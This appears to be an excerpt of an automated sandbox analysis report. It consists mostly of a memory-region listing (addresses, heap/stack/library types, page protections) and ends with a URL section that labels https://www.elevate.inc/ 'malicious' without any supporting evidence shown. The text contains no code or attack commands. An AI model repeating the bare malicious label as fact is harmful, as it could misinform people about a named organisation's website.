trusted library allocation
page read and write
4E7F9E000
stack
page read and write
7FFF7B450000
trusted library allocation
page read and write
7FFF7B180000
trusted library allocation
page read and write
1CBBD749000
heap
page read and write
191522BD000
trusted library allocation
page read and write
7FFF7B2E0000
trusted library allocation
page read and write
19168993000
heap
page read and write
11DB7D30000
heap
page read and write
217224E000
stack
page read and write
7FFF7B250000
trusted library allocation
page read and write
1CBA6D77000
trusted library allocation
page read and write
1CBBD6FE000
heap
page read and write
1CBA3660000
heap
page read and write
19169268000
heap
page read and write
7FFF7B460000
trusted library allocation
page read and write
7FFF7B170000
trusted library allocation
page read and write
7FFF7B7F0000
trusted library allocation
page read and write
217147A000
stack
page read and write
7FFF7B750000
trusted library allocation
page read and write
1915213F000
trusted library allocation
page read and write
1CBA50C0000
heap
page read and write
33899FE000
stack
page read and write
3389D3E000
stack
page read and write
7FFF7B0BA000
trusted library allocation
page read and write
191692FB000
heap
page read and write
1CBBD686000
heap
page read and write
7FFF7B300000
trusted library allocation
page read and write
1CBA352F000
heap
page read and write
7FFF7B180000
trusted library allocation
page read and write
7FFF7B2C0000
trusted library allocation
page read and write
7FFF7B380000
trusted library allocation
page read and write
7FFF7B090000
trusted library allocation
page read and write
1914EEA9000
heap
page read and write
7FFF7B660000
trusted library allocation
page read and write
27EB564A000
heap
page read and write
7FFF7B7CA000
trusted library allocation
page read and write
7FFF7B550000
trusted library allocation
page read and write
7FFF7B85B000
trusted library allocation
page read and write
7FFF7AFD0000
trusted library allocation
page read and write
7FFF7B650000
trusted library allocation
page read and write
191691EF000
heap
page read and write
7FFF7B0B0000
trusted library allocation
page read and write
1CBBD5D7000
heap
page execute and read and write
27EB6F50000
heap
page read and write
7FFF7AFE0000
trusted library allocation
page read and write
7FFF7B220000
trusted library allocation
page read and write
7FFF7B600000
trusted library allocation
page read and write
1CBA33F0000
heap
page read and write
B3D9DFE000
stack
page read and write
7FFF7B490000
trusted library allocation
page read and write
7FFF7B250000
trusted library allocation
page execute and read and write
7FFF7B080000
trusted library allocation
page read and write
19151F9A000
trusted library allocation
page read and write
1CBA3620000
trusted library allocation
page read and write
7FFF7B830000
trusted library allocation
page read and write
7FFF7B520000
trusted library allocation
page read and write
7FFF7B3D0000
trusted library allocation
page execute and read and write
7FFF7AE30000
trusted library allocation
page read and write
191690E0000
heap
page read and write
3389CBE000
stack
page read and write
19160C7E000
trusted library allocation
page read and write
27EB5626000
heap
page read and write
7FFF7B270000
trusted library allocation
page read and write
1CBA354A000
heap
page read and write
217234E000
stack
page read and write
7FFF7B4B0000
trusted library allocation
page read and write
1914F173000
trusted library allocation
page read and write
7FFF7B530000
trusted library allocation
page read and write
7FFF7B0C5000
trusted library allocation
page read and write
19151FEF000
trusted library allocation
page read and write
7FFF7B820000
trusted library allocation
page read and write
7FFF7B110000
trusted library allocation
page read and write
1CBBD6B4000
heap
page read and write
7FFF7B060000
trusted library allocation
page read and write
7FFF7B770000
trusted library allocation
page read and write
7FFF7B070000
trusted library allocation
page read and write
7FFF7B800000
trusted library allocation
page read and write
7FFF7B7D0000
trusted library allocation
page execute and read and write
7FFF7B7E0000
trusted library allocation
page read and write
21710FE000
stack
page read and write
7FFF7B470000
trusted library allocation
page read and write
21712FB000
stack
page read and write
7FFF7B550000
trusted library allocation
page read and write
338AACE000
stack
page read and write
2170DB1000
stack
page read and write
7FFF7AF40000
trusted library allocation
page execute and read and write
1CBBD45F000
heap
page read and write
7FFF7B4E0000
trusted library allocation
page read and write
1CBA68D2000
trusted library allocation
page read and write
7FFF7B520000
trusted library allocation
page read and write
7FFF7B800000
trusted library allocation
page read and write
B3D96FE000
stack
page read and write
7FFF7B450000
trusted library allocation
page read and write
191525AE000
trusted library allocation
page read and write
1916929F000
heap
page read and write
7FFF7B630000
trusted library allocation
page read and write
7FFF7B4D0000
trusted library allocation
page read and write
7FFF7B0A0000
trusted library allocation
page read and write
7FFF7B0CE000
trusted library allocation
page read and write
33897FE000
stack
page read and write
7FFF7B190000
trusted library allocation
page execute and read and write
7FFF7B460000
trusted library allocation
page read and write
33896FE000
stack
page read and write
1CBA34C0000
heap
page read and write
191691DD000
heap
page read and write
2171676000
stack
page read and write
7FFF7AE34000
trusted library allocation
page read and write
7FFF7AE30000
trusted library allocation
page read and write
7FFF7B050000
trusted library allocation
page read and write
1CBA68D0000
trusted library allocation
page read and write
1CBA3710000
heap
page read and write
7FFF7B7C3000
trusted library allocation
page read and write
7FFF7B540000
trusted library allocation
page read and write
1CBBD65E000
heap
page read and write
217107E000
stack
page read and write
1CBBD744000
heap
page read and write
1CBA35A8000
heap
page read and write
19151FAE000
trusted library allocation
page read and write
1CBA6DD7000
trusted library allocation
page read and write
7FFF7B670000
trusted library allocation
page read and write
27EB5661000
heap
page read and write
27EB5500000
heap
page read and write
1CBA603C000
trusted library allocation
page read and write
7FFF7B360000
trusted library allocation
page read and write
7FFF7AE20000
trusted library allocation
page read and write
7FFF7B760000
trusted library allocation
page read and write
1CBA6D8E000
trusted library allocation
page read and write
1CBA6DDD000
trusted library allocation
page read and write
1CBA68D4000
trusted library allocation
page read and write
338A98D000
stack
page read and write
19151AE8000
trusted library allocation
page read and write
21713FE000
stack
page read and write
1914EEE9000
heap
page read and write
7FFF7B070000
trusted library allocation
page read and write
191515BE000
trusted library allocation
page read and write
191691FF000
heap
page read and write
338A9CE000
stack
page read and write
217127E000
stack
page read and write
1914EEE1000
heap
page read and write
7FFF7B2B0000
trusted library allocation
page read and write
1CBA3735000
heap
page read and write
7FFF7B04A000
trusted library allocation
page read and write
4E7F1C000
stack
page read and write
7FFF7B880000
trusted library allocation
page read and write
7FFF7B430000
trusted library allocation
page read and write
7FFF7AF16000
trusted library allocation
page execute and read and write
1CBBD756000
heap
page read and write
7FFF7B630000
trusted library allocation
page read and write
7FFF7B390000
trusted library allocation
page read and write
7FFF7B560000
trusted library allocation
page execute and read and write
27EB55F9000
heap
page read and write
7FFF7B3E0000
trusted library allocation
page read and write
1CBA35F0000
trusted library allocation
page read and write
1CBBD410000
heap
page read and write
7FFF7B290000
trusted library allocation
page read and write
7FFF7B0D0000
trusted library allocation
page read and write
7FFF7B390000
trusted library allocation
page read and write
27EB5602000
heap
page read and write
1CBA3410000
heap
page read and write
191525B2000
trusted library allocation
page read and write
7FFF7B260000
trusted library allocation
page read and write
7FFF7B350000
trusted library allocation
page read and write
191609A1000
trusted library allocation
page read and write
7FFF7B7A0000
trusted library allocation
page read and write
3389BB7000
stack
page read and write
1CBA4EE1000
heap
page read and write
7FFF7B850000
trusted library allocation
page read and write
27EB554D000
heap
page read and write
7FFF7B370000
trusted library allocation
page read and write
21715F8000
stack
page read and write
191522B9000
trusted library allocation
page read and write
4E827F000
stack
page read and write
191524F3000
trusted library allocation
page read and write
7FFF7B660000
trusted library allocation
page read and write
11DB7D75000
heap
page read and write
7FFF7B840000
trusted library allocation
page read and write
21717FE000
stack
page read and write
7FFF7B7DA000
trusted library allocation
page read and write
7FFF7AE24000
trusted library allocation
page read and write
7FFF7B600000
trusted library allocation
page read and write
1914F0C0000
trusted library allocation
page read and write
7FFF7B100000
trusted library allocation
page execute and read and write
1CBA3450000
heap
page read and write
7FFF7B3C0000
trusted library allocation
page read and write
7FFF7B4F0000
trusted library allocation
page read and write
B3D97FE000
stack
page read and write
3389C36000
stack
page read and write
19151F95000
trusted library allocation
page read and write
7FFF7B640000
trusted library allocation
page read and write
1CBB55C7000
trusted library allocation
page read and write
33893C2000
stack
page read and write
1914F080000
heap
page read and write
19160999000
trusted library allocation
page read and write
1CBB5421000
trusted library allocation
page read and write
11DB7B47000
heap
page read and write
7FFF7B500000
trusted library allocation
page read and write
1914F170000
trusted library allocation
page read and write
7FFF7AE4B000
trusted library allocation
page read and write
7FFF7B130000
trusted library allocation
page read and write
7FFF7B610000
trusted library allocation
page read and write
7FFF7AE3D000
trusted library allocation
page execute and read and write
7FFF7B5E0000
trusted library allocation
page read and write
1CBBD712000
heap
page read and write
7FFF7B063000
trusted library allocation
page read and write
7FFF7B7B0000
trusted library allocation
page read and write
27EB5540000
heap
page read and write
4E82FF000
stack
page read and write
1916920B000
heap
page read and write
19151FAC000
trusted library allocation
page read and write
7FFF7B3B0000
trusted library allocation
page read and write
7FFF7AEDC000
trusted library allocation
page execute and read and write
27EB5545000
heap
page read and write
7FFF7B400000
trusted library allocation
page read and write
19169017000
heap
page read and write
7FFF7B690000
trusted library allocation
page read and write
338977E000
stack
page read and write
7FFF7B840000
trusted library allocation
page read and write
7FFF7B2C0000
trusted library allocation
page read and write
7FFF7B650000
trusted library allocation
page read and write
1CBA3563000
heap
page read and write
1CBA356B000
heap
page read and write
1CBA704F000
trusted library allocation
page read and write
7FFF7B110000
trusted library allocation
page read and write
1CBA6D9B000
trusted library allocation
page read and write
1CBBD764000
heap
page read and write
7FFF7B0A5000
trusted library allocation
page read and write
338967E000
stack
page read and write
7FFF7B440000
trusted library allocation
page read and write
19151FBA000
trusted library allocation
page read and write
1CBBD44A000
heap
page read and write
191692CC000
heap
page read and write
7FFF7B0F0000
trusted library allocation
page read and write
1CBB5411000
trusted library allocation
page read and write
21716FF000
stack
page read and write
1CBA5411000
trusted library allocation
page read and write
7FFF7B7F0000
trusted library allocation
page read and write
7FFF7B680000
trusted library allocation
page read and write
1914EF24000
heap
page read and write
7FFF7B780000
trusted library allocation
page read and write
1CBA35AD000
heap
page read and write
11DB7D10000
heap
page read and write
7FFF7B730000
trusted library allocation
page read and write
1CBBD49D000
heap
page read and write
19168FB0000
heap
page read and write
7FFF7AEEC000
trusted library allocation
page execute and read and write
7FFF7AF06000
trusted library allocation
page execute and read and write
7FFF7AF50000
trusted library allocation
page execute and read and write
1CBA5494000
trusted library allocation
page read and write
191691C0000
heap
page read and write
7FFF7B076000
trusted library allocation
page read and write
7FFF7B490000
trusted library allocation
page read and write
19150BBE000
trusted library allocation
page read and write
7FFF7B160000
trusted library allocation
page read and write
11DB7B40000
heap
page read and write
7FFF7B375000
trusted library allocation
page read and write
19150A19000
trusted library allocation
page read and write
7FFF7B540000
trusted library allocation
page read and write
1CBA36A3000
trusted library allocation
page read and write
1914F135000
heap
page read and write
7FFF7B4A0000
trusted library allocation
page read and write
19168F3B000
heap
page read and write
7FFF7B150000
trusted library allocation
page read and write
7FFF7B0A0000
trusted library allocation
page read and write
11DB7D70000
heap
page read and write
338A90E000
stack
page read and write
1CBBD46F000
heap
page read and write
11DB9660000
heap
page read and write
7FFF7B740000
trusted library allocation
page read and write
19168F86000
heap
page read and write
27EB55F0000
heap
page read and write
2171574000
stack
page read and write
7FFF7B066000
trusted library allocation
page read and write
7FFF7B820000
trusted library allocation
page read and write
7FFF7B680000
trusted library allocation
page read and write
7FFF7AFC0000
trusted library allocation
page read and write
7FFF7B730000
trusted library allocation
page read and write
27EB5420000
heap
page read and write
1CBA34D2000
heap
page read and write
7FFF7AE37000
trusted library allocation
page read and write
21714F4000
stack
page read and write
B3D9CFE000
stack
page read and write
7FFF7B510000
trusted library allocation
page read and write
19169275000
heap
page read and write
19168EC0000
heap
page execute and read and write
7FFF7B560000
trusted library allocation
page execute and read and write
7FFF7B270000
trusted library allocation
page read and write
7FFF7B380000
trusted library allocation
page read and write
191609F5000
trusted library allocation
page read and write
217177E000
stack
page read and write
7FFF7B530000
trusted library allocation
page read and write
7FFF7B0B0000
trusted library allocation
page read and write
7FFF7B81D000
trusted library allocation
page read and write
3389EB9000
stack
page read and write
7FFF7B75D000
trusted library allocation
page read and write
19160991000
trusted library allocation
page read and write
7FFF7B6B0000
trusted library allocation
page execute and read and write
1914EF2B000
heap
page read and write
B3D9FFB000
stack
page read and write
1CBA5070000
heap
page execute and read and write
1CBBD5F0000
heap
page read and write
7FFF7B285000
trusted library allocation
page read and write
B3D94FA000
stack
page read and write
7FFF7B0F0000
trusted library allocation
page read and write
19151FBE000
trusted library allocation
page read and write
7FFF7B160000
trusted library allocation
page execute and read and write
19168F75000
heap
page read and write
7FFF7B03B000
trusted library allocation
page read and write
7FFF7B150000
trusted library allocation
page read and write
7FFF7B910000
trusted library allocation
page read and write
1CBA3310000
heap
page read and write
19160B47000
trusted library allocation
page read and write
7FFF7B3F0000
trusted library allocation
page read and write
27EB7390000
heap
page read and write
1914EE50000
heap
page read and write
7FFF7B211000
trusted library allocation
page read and write
7FFF7B4F0000
trusted library allocation
page read and write
7FFF7B5E0000
trusted library allocation
page read and write
7FFF7B76A000
trusted library allocation
page read and write
7FFF7B7A0000
trusted library allocation
page read and write
7DF42D700000
trusted library allocation
page execute and read and write
7FFF7B140000
trusted library allocation
page execute and read and write
7FFF7B253000
trusted library allocation
page read and write
7FFF7AE2D000
trusted library allocation
page execute and read and write
7FFF7B4D0000
trusted library allocation
page read and write
7FFF7B470000
trusted library allocation
page read and write
1CBA36A0000
trusted library allocation
page read and write
1CBA563C000
trusted library allocation
page read and write
7FFF7B420000
trusted library allocation
page read and write
7FFF7B280000
trusted library allocation
page read and write
7FFF7B4E0000
trusted library allocation
page read and write
7FFF7B2A0000
trusted library allocation
page read and write
7FFF7AED0000
trusted library allocation
page read and write
7FFF7B7C0000
trusted library allocation
page read and write
7FFF7AE50000
trusted library allocation
page read and write
1CBA357F000
heap
page read and write
7FFF7AFD0000
trusted library allocation
page read and write
1CBA3567000
heap
page read and write
1CBA355F000
heap
page read and write
7FFF7B4B0000
trusted library allocation
page read and write
7FFF7B6A0000
trusted library allocation
page read and write
1CBA6F8A000
trusted library allocation
page read and write
7FFF7B690000
trusted library allocation
page read and write
7FFF7B77A000
trusted library allocation
page read and write
1CBBD738000
heap
page read and write
7FFF7B242000
trusted library allocation
page read and write
19168F17000
heap
page execute and read and write
7FFF7B4A0000
trusted library allocation
page read and write
7FFF7B080000
trusted library allocation
page read and write
7FFF7B770000
trusted library allocation
page read and write
19169313000
heap
page read and write
217117E000
stack
page read and write
1CBA50C5000
heap
page read and write
7FFF7AEE0000
trusted library allocation
page read and write
7FFF7B510000
trusted library allocation
page read and write
7FFF7B810000
trusted library allocation
page read and write
B3D9AFE000
stack
page read and write
7FFF7B2D0000
trusted library allocation
page read and write
1CBBD760000
heap
page read and write
7FFF7B2F0000
trusted library allocation
page execute and read and write
7FFF7B2E0000
trusted library allocation
page read and write
7FFF7B3B0000
trusted library allocation
page read and write
1914F0E0000
trusted library allocation
page read and write
7FFF7B780000
trusted library allocation
page read and write
1914EF98000
heap
page read and write
7FFF7B752000
trusted library allocation
page read and write
7FFF7B310000
trusted library allocation
page read and write
1CBA6DF6000
trusted library allocation
page read and write
7FFF7B120000
trusted library allocation
page read and write
7FFF7B860000
trusted library allocation
page read and write
19151CD1000
trusted library allocation
page read and write
7FFF7B790000
trusted library allocation
page read and write
191692AC000
heap
page read and write
1CBB5487000
trusted library allocation
page read and write
7FFF7B500000
trusted library allocation
page read and write
1914F0F0000
heap
page readonly
7FFF7B0C5000
trusted library allocation
page read and write
7FFF7B6B0000
trusted library allocation
page execute and read and write
191692E0000
heap
page read and write
1CBBD730000
heap
page read and write
1914F1E5000
heap
page read and write
1914F1D0000
heap
page read and write
7FFF7AED6000
trusted library allocation
page read and write
3389ABE000
stack
page read and write
B3D99FE000
stack
page read and write
B3D9BFF000
stack
page read and write
1CBBD4FD000
heap
page read and write
3389DBE000
stack
page read and write
7FFF7B170000
trusted library allocation
page read and write
3389B34000
stack
page read and write
7FFF7B2F0000
trusted library allocation
page read and write
7FFF7B750000
trusted library allocation
page read and write
21723CD000
stack
page read and write
7FFF7B410000
trusted library allocation
page read and write
1CBBD622000
heap
page read and write
1914EE70000
heap
page read and write
7FFF7B5F0000
trusted library allocation
page read and write
7FFF7B0C0000
trusted library allocation
page read and write
19152327000
trusted library allocation
page read and write
7FFF7B2DC000
trusted library allocation
page read and write
2170DFE000
stack
page read and write
7FFF7B480000
trusted library allocation
page read and write
7FFF7B870000
trusted library allocation
page read and write
7FFF7B263000
trusted library allocation
page read and write
1914EF26000
heap
page read and write
1CBA6DF4000
trusted library allocation
page read and write
7FFF7B740000
trusted library allocation
page read and write
1CBA7053000
trusted library allocation
page read and write
7FFF7B810000
trusted library allocation
page read and write
217137F000
stack
page read and write
19168F20000
heap
page read and write
1CBA3640000
trusted library allocation
page read and write
7FFF7B4C0000
trusted library allocation
page read and write
1CBBD5D0000
heap
page execute and read and write
1CBBD810000
heap
page read and write
7FFF7B330000
trusted library allocation
page read and write
338987B000
stack
page read and write
7FFF7B3D0000
trusted library allocation
page read and write
7FFF7B880000
trusted library allocation
page execute and read and write
7FFF7AFD2000
trusted library allocation
page read and write
7FFF7B220000
trusted library allocation
page read and write
7FFF7B850000
trusted library allocation
page read and write
19168F4F000
heap
page read and write
7FFF7B7D0000
trusted library allocation
page read and write
7FFF7B190000
trusted library allocation
page read and write
1CBBD4AF000
heap
page read and write
7FFF7B860000
trusted library allocation
page read and write
21711FD000
stack
page read and write
1CBA6D9F000
trusted library allocation
page read and write
7FFF7B120000
trusted library allocation
page read and write
1CBBD70E000
heap
page read and write
19169480000
heap
page read and write
1CBA3630000
heap
page readonly
1CBBD4FB000
heap
page read and write
7FFF7B3C0000
trusted library allocation
page read and write
1CBB5475000
trusted library allocation
page read and write
1914F130000
heap
page read and write
7FFF7B610000
trusted library allocation
page read and write
7FFF7B0E0000
trusted library allocation
page read and write
1CBB5419000
trusted library allocation
page read and write
338997E000
stack
page read and write
7FFF7B130000
trusted library allocation
page read and write
7FFF7B5F0000
trusted library allocation
page read and write
7FFF7B7B4000
trusted library allocation
page read and write
7FFF7B2B0000
trusted library allocation
page read and write
7FFF7B773000
trusted library allocation
page read and write
7FFF7AE3B000
trusted library allocation
page read and write
1914EEDD000
heap
page read and write
7FFF7B640000
trusted library allocation
page read and write
7FFF7AE23000
trusted library allocation
page execute and read and write
338A88E000
stack
page read and write
1CBA5000000
heap
page execute and read and write
7FFF7B7E0000
trusted library allocation
page read and write
7FFF7B040000
trusted library allocation
page read and write
1914F1E0000
heap
page read and write
1914F100000
trusted library allocation
page read and write
7FFF7B6A0000
trusted library allocation
page read and write
7FFF7B620000
trusted library allocation
page read and write
7FFF7B0E0000
trusted library allocation
page read and write
3389E38000
stack
page read and write
19150991000
trusted library allocation
page read and write
7FFF7B2A0000
trusted library allocation
page read and write
1914EE40000
heap
page read and write
7FFF7AE40000
trusted library allocation
page read and write
7FFF7B480000
trusted library allocation
page read and write
7FFF7B7B0000
trusted library allocation
page read and write
7FFF7B7B2000
trusted library allocation
page read and write
7FFF7B830000
trusted library allocation
page read and write
7FFF7B090000
trusted library allocation
page read and write
7FFF7B1A0000
trusted library allocation
page execute and read and write
7FFF7B340000
trusted library allocation
page read and write
7FFF7B3A0000
trusted library allocation
page read and write
B3D95FE000
stack
page read and write
7FFF7B04B000
trusted library allocation
page read and write
1914EEE7000
heap
page read and write
19168F10000
heap
page execute and read and write
7FFF7B296000
trusted library allocation
page read and write
1914EEA0000
heap
page read and write
7FFF7B3A0000
trusted library allocation
page read and write
7FFF7AE33000
trusted library allocation
page execute and read and write
7FFF7B7BD000
trusted library allocation
page read and write
7FFF7B232000
trusted library allocation
page read and write
1CBA6D7C000
trusted library allocation
page read and write
1CBBD72D000
heap
page read and write
7FFF7B790000
trusted library allocation
page execute and read and write
7FFF7B870000
trusted library allocation
page read and write
1914F120000
heap
page execute and read and write
There are 509 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://www.elevate.inc/
malicious
https://www.elevate.inc/
malicious
https://www.elevate.inc/
malicious
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/
https://www.elevate.inc/